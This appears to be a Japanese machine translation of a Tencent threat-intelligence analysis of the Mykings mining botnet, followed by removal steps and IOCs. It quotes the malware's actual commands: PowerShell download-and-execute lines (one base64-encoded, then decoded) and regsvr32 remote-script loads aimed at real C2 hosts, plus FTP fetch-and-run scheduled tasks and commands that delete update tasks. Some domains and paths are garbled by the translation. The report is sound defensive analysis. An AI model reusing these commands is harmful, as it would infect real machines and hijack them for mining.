Mykingsマイニングボットネットがインフラを更新、新たなウォレット獲得額は60万超

背景

Tencent Security Yujian Threat Intelligence Center は最近、Mykings マイニング ボットネットがインフラストラクチャを更新したことを検出しました。ウイルスにより新たなドメイン名が有効になり、新たなウォレットを使用したマイニング収入は60万人民元を超え、現在も1日あたり約10 XMRのペースでマイニングを続けています。

Mykings は、ポート 1433 を爆破したり、EternalBlue の脆弱性を攻撃したりするなどの方法でシステムに侵入し、RAT や Miner などのトロイの木馬を埋め込んで巨大なボットネットを形成します。

Mykings マイニング ボットネットの更新バージョンには、次の機能があります。

1. EternalBlue 脆弱性、1433 ポートブラストなどの手法を悪用して攻撃を仕掛けるものであり、Mirai ボットネットの感染コードが含まれています。

2. MBR に感染し (感染プロセスは Dark Cloud ウイルスと同じです)、Rookit を使用してウイルス対策ソフトウェアと戦い、ペイロードをダウンロードします。

3. 競合するマイニングトロイの木馬を削除し、ポートを閉じて他のウイルス侵入チャネルをブロックします。

4. 複数のスケジュールされたタスク バックドアと WMI バックドアをインストールすることで永続性が実現されます。

Mykings マイニング ボットネット

詳細な分析

感染したデバイスはWMIバックドアを通じてPowershellコマンドを実行します。

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);$n を開始します。

次に、blue.txt から 3 つのトロイの木馬のダウンロード アドレスを取得し、1 つずつダウンロードして実行します。

上記の 3 つのトロイの木馬は次のように分析されます。

• ok.exe

ok.exe の機能は MBR に感染することです。これにより、自己保護、ウイルス対策ソフトウェアへの耐性、およびインターネット経由でペイロードをダウンロードする機能が可能になります。

感染プロセスは、Tencent Yujian Threat Intelligence Center によって発見された Dark Cloud シリーズのウイルスに似ています (https://s.tencent.com/research/report/622.html を参照)。最後の段階では、MBR トロイの木馬は ZwCreateSection をフックし、ルートキットをカーネル空間にマッピングして実行機会を取得した後にそれを実行し、最後に ZwCreateSection にジャンプして実行を続行します。

ルートキットの主な機能は、自己保護、ウイルス対策プロセスの終了、システム プロセス winlogon.exe を挿入してペイロードをオンラインでダウンロードし、次の段階の悪意のある動作を実行することです。

ルートキットはトロイの木馬の更新に使用される IP アドレスを取得します: http[:]//www.upme0611.info/address.txt

次の段階のペイロード コード構成ファイル http[:]//mbr.kill0604.ru/cloud.txt を取得し、構成ファイルからマイニング モジュール upsupx.exe のダウンロード アドレスを取得して、ファイルをダウンロードして実行します。

• アップスアップス

upsupx.exe がダウンロードされ、実行のために C:\Windows\Temp\conhost.exe に保存されます。復号化およびマイニング関連の構成ファイルを C:\Program Files\Common Files\xpdown.dat にダウンロードします。設定ファイルは次のとおりです。

45.58.135.106

74.222.14.61

139.5.177.10

翻訳元

削除するマイニングトロイの木馬の競合製品または古いバージョンを取得します。ファイル名、パス、および削除するかどうかを指定します。

次に、レジストリの場所 (HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0) を読み取ります。

CPU の種類と周波数を検出し、CPU の種類と周波数に基づいて使用するマイニング プログラムの種類を決定します。

オープンソースのマイニングプログラム XMRig をダウンロードします。アドレスは http[:]//198.148.90.34/64work.rar、プログラムバージョンは 2.14.1、マイニングプログラムの起動パスは C:\Windows\inf\lsmm.exe です。

起動後、リソースファイルからマイニング設定ファイルを取得し、マイニングプールのアドレスを取得します: pool.minexmr.com:5555

ウォレット: 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

ウォレットクエリ収入によると：1077 XMRが採掘された

現在の市場価格は60万人民元に相当する。

• u.exe

u.exe は、攻撃モジュール C:\Windows\system\msinfo.exe を使用して、イントラネットおよびエクストラネット マシンの IP セグメントをスキャンし、攻撃します。手法には、EternalBlue 脆弱性の悪用、SQL ブラスト、Telnet ブラスト、RDP ブラストなどがあります。一部の攻撃ペイロードには、mirai ボットネットに感染するための関連コードも含まれています。

ポート445/1433などをスキャンします。

EternalBlue の脆弱性攻撃

SQLブルートフォース攻撃

ログインを爆破した後にシェルコードを実行する

Telnetブルートフォース攻撃

RDPブルートフォース攻撃

持続性

Myings マイニング ボットネットは、永続性を維持するために次の方法を使用します。

1.他のウイルスによって設定されたログインアカウントを削除する

net user を使用して、アカウント mm123$、admin、および sysadm05 を削除します。 attrib コマンドを使用して、Temp ディレクトリ内のファイルを隠し属性に設定します。 taskkill を使用して他のマイニング プロセスを強制終了し、他のマイニング プロセス ファイルとリモート デスクトップ プログラム ファイルを削除します。 cacls を使用して、一部のディレクトリとファイルの可視性を設定します。

wmic コマンドを使用して、システム プロセスを装ったマイニング プログラムを削除します。判断の根拠は、ファイルはシステムプロセス名であるが、システムディレクトリ内に存在しないことです。

2. 関連ファイルとパスのプロパティを非表示に設定する

3. システムの自動更新をオフにする

次のスケジュールされたタスクを削除し、システムの自己更新をオフにします。

SCHTASKS /Delete /TN "WindowsUpdate1" /F &SCHTASKS /Delete /TN "WindowsUpdate3" /F &SCHTASKS /Delete /TN "Windows_Update" /F &SCHTASKS /Delete /TN "Update" /F &SCHTASKS /Delete /TN "Update2" /F &SCHTASKS /Delete /TN "Update4" /F &SCHTASKS /Delete /TN "Update3" /F &SCHTASKS /Delete /TN "windowsinit" /F &SCHTASKS /Delete /TN "System Security Check" /F &SCHTASKS /Delete /TN "AdobeFlashPlayer" /F &SCHTASKS /Delete /TN "updat_windows" /F &SCHTASKS /Delete /TN "at1" /F &SCHTASKS /Delete /TN "at2" /F &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F &SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F

4. ポート139/445などへの接続をブロックします。

ネットワークファイアウォールの設定で、ポート65536の接続要求を許可に設定し、ポート135/137/138/139/445の接続を拒否するように設定します。

5. レジストリのスタートアップ項目を追加する

レジストリに実行スタートアップ項目を追加します。

6. スケジュールされたタスクのバックドアを大量に追加

スケジュールされたタスクを 5 つ追加します。

ミッション1: マイサ

実行: cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe

ミッション2: Mysa1

実行: rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

ミッション3: Mysa2

実行: cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

ミッション4: Mysa3

実行: /c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe

タスク5: OK

実行: cmd c:\windows\debug\ok.dat,ServiceMainaaaa

計画されている各タスクのバックドア機能は次のようにまとめられます。

7. 大量のコマンドを実行するためのWMIバックドアを追加する

WMI イベント フィルターとコンシューマーを作成してバックドアを追加します。

古いイベント フィルターとコンシューマーを削除します。

fuckyoumm2_filter fuckyoumm2_consumer Windows イベント フィルターWindows イベント コンシューマー4 Windows イベント コンシューマーfuckayoumm3 fuckayoumm4

新しいイベント フィルターとコンシューマーを作成します。

クソッ3

クソッ！

WMI バックドアによって実行されるコードは次のとおりです。

(1) powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAn ACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

（デコード後：

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;} )

（2） powershell.exe

(新しいオブジェクト system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3) powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4) powershell.exe IEX

(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5) regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll

(6) regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll

WMI バックドアによって実行されるコマンド機能は、次のようにまとめられます。

安全のヒント

1. MS010-17「エターナルブルー」の脆弱性

サーバーは不要なポート（135、139、445 など）を一時的に閉じます。詳細については、https://guanjia.qq.com/web_clinic/s8/585.html を参照してください。

EternalBlue シリーズの脆弱性を速やかに修正するために、Windows システムのパッチをダウンロードして更新してください。

XP、Windows Server 2003、Win 8 およびその他のシステム: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、WindowsServer 2008、Windows10、WindowsServer2016 およびその他のシステム: https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2. サーバー上で強力なパスワードを使用し、ハッカーによるブルートフォース攻撃を防ぐために弱いパスワードの使用を避けます。

3. ウイルス攻撃の可能性を阻止するためにウイルス対策ソフトウェアを使用します。

4. Mykings ウイルスを検出して駆除するために Tencent Yudian を使用するほかに、Mykings ウイルスに感染したユーザーは、以下の手順に従って手動でウイルスを駆除することもできます。

1) ファイルを削除する

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\ヘルプ\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2) レジストリを削除する

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3) スケジュールされたタスクを削除する

マイサ

マイサ1

マイサ2

マイサ3

わかりました

4) WMIイベントフィルターとコンシューマーを削除する

fuckyoumm2_filter fuckyoumm2_consumer Windows イベント フィルター Windows イベント コンシューマー4 Windows イベント コンシューマー fuckayoumm3 fuckayoumm4

クソッ3

クソッ！

IOC

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

A1B9F55BF93E82550B4C21CD3230C3C3

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

74.222.14.61

54.255.141.50

ドメイン

翻訳:

翻訳元

翻訳元

js.0603bye.info

pc0416.xyz のファイル

ダウン2.b5w91.com

wmi.1217bye.ホスト

ダウン.mys2018.xyz

メールアドレス

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/アドレス.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//208.110.71.194/cloud.txt

http[:]//185.22.172.13/upsupx.exe

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//173.208.139.170/2.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

ウォレット: 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

参考リンク

https://www.freebuf.com/articles/web/146393.html

テンセント

https://www.freebuf.com/column/187489.html

出典: テンセント ユジアン 脅威インテリジェンス センター